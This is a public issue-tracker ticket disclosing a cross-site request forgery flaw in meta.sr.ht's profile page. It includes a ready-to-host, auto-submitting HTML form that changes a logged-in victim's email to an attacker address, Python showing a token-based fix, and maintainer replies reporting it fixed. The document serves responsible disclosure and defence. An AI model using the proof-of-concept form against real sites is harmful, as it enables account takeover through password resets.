Security: Vulnerable to Cross-site Request Forgery (CSRF)

The website is vulnerable to cross-site request forgery (CSRF). Attackers can host the following HTML to force a user into changing their email address to an attacker's email address.

  <!-- attacker-hosted page: rewrites its visible URL, then posts a profile update using the victim's meta.sr.ht session -->
  <script>history.pushState('', '', '/')</script>
  <form action="https://meta.sr.ht/profile" method="POST">
    <!-- the browser attaches the victim's meta.sr.ht session cookie to this cross-site POST automatically -->
    <input type="hidden" name="email" value="attacker&#64;example&#46;com" />
    <input type="hidden" name="url" value="" />
    <input type="hidden" name="location" value="" />
    <input type="hidden" name="bio" value="" />
    <input type="submit" value="Submit request" />
  </form>
  <!-- submit as soon as the page loads, so no user interaction is needed -->
  <script>document.forms[0].submit()</script>

Once a logged-in user visits the page, a POST request is made that modifies their email address. The attacker then receives a confirmation email and can now perform a password reset. The request above is just an example, but this applies to any state-changing request.

Feel free to ping me if you have any other questions.

Resources: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
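As an added illustration of the fix the linked cheat sheet recommends (the synchronizer token pattern), and not code from this ticket or from meta.sr.ht itself: the handler below binds a random token to the user's session with an HMAC and refuses any profile update that does not carry a token minted for that same session. The session id, the `SESSIONS` store, the `SERVER_SECRET` and the `_csrf_token` field name are all assumptions made for the example; the forged request body is the one the ticket's form would send.

```python
import hmac
import hashlib
import secrets
from urllib.parse import parse_qs

# Hypothetical server-side secret; a real deployment loads this from configuration.
SERVER_SECRET = secrets.token_bytes(32)

# Constructed session store for the example: session id -> profile record.
SESSIONS = {
    "sess-victim": {"email": "victim@example.com", "url": "", "location": "", "bio": ""},
}


def issue_csrf_token(session_id: str) -> str:
    """Mint a synchronizer token: a random nonce plus an HMAC binding it to this session."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    """Accept only a token whose MAC was computed for this session; compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep or not nonce or not mac:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


def handle_profile_post(session_id: str, body: str) -> tuple[int, dict]:
    """POST /profile: apply the update only if the body carries a valid token for the session."""
    profile = SESSIONS[session_id]
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if not verify_csrf_token(session_id, form.get("_csrf_token", "")):
        # A cross-site form reaches here with the session cookie but no usable token.
        return 403, profile
    for field in ("email", "url", "location", "bio"):
        if field in form:
            profile[field] = form[field]
    return 200, profile


def demo() -> tuple[int, int, int]:
    """Replay the ticket's attack and two legitimate-looking variants against the guarded handler."""
    # 1. The attacker-hosted form from the ticket: cookie rides along, no token at all.
    forged = "email=attacker%40example.com&url=&location=&bio="
    forged_status, _ = handle_profile_post("sess-victim", forged)

    # 2. A token the attacker minted for their own session does not transfer to the victim's.
    other = issue_csrf_token("sess-attacker")
    stolen_status, _ = handle_profile_post(
        "sess-victim", f"email=attacker%40example.com&_csrf_token={other}"
    )

    # 3. The real profile page embeds a token for the victim's own session; this one succeeds.
    token = issue_csrf_token("sess-victim")
    ok_status, _ = handle_profile_post("sess-victim", f"email=new%40example.com&_csrf_token={token}")
    return forged_status, stolen_status, ok_status


if __name__ == "__main__":
    print(demo())  # (403, 403, 200)
```

The token is checked on every state-changing request, not only on `/profile`; marking the session cookie `SameSite=Lax` or `Strict` is a useful second layer but does not replace the token, because older browsers and some cross-site navigations do not honour it.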


~sircmpwn 4 years ago

Thank you. In the future, send security-related issues as an email, not as a public ticket.

~alxjsn 4 years ago

Sorry about that. Feel free to remove this ticket then.

~sircmpwn 4 years ago

I have disabled this feature in meta.sr.ht in production for now, a proper fix will follow shortly.

~sircmpwn REPORTED FIXED 4 years ago
